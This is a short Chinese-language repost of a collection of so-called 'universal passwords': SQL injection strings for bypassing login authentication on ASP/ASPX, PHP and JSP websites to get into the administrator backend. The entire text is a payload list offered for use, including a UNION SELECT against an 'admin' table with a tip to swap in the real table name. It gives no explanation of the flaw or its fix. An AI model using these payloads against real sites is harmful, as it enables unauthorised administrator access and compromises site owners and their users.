本文轉自:http://hi.baidu.com/foraya/item/9cb8272c92b9ef1b73863e29
所謂萬能密碼就是繞過登入驗證直接進入管理者背景的密碼,這種類型的密碼可以通用到很多存在此漏洞的網站是以稱之為萬能。
自己也有過收集,别人總結的我又添加了幾個
asp aspx萬能密碼
1:"or "a"="a
2: ')or('a'='a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or'a'='a
8:"or"="a'='a
9:'or''='
10:'or'='or'
11: 1 or '1'='1'=1
12: 1 or '1'='1' or 1=1
13: 'OR 1=1%00
14: "or 1=1%00
15: 'xor
16: 使用者名 ' UNION Select 1,1,1 FROM admin Where ''=' (替換表名admin)
密碼 1
17..admin' or 'a'='a 密碼随便
PHP萬能密碼
'or 1=1/*
User: something
Pass: ' OR '1'='1
jsp 萬能密碼
1'or'1'='1
admin' OR 1=1/*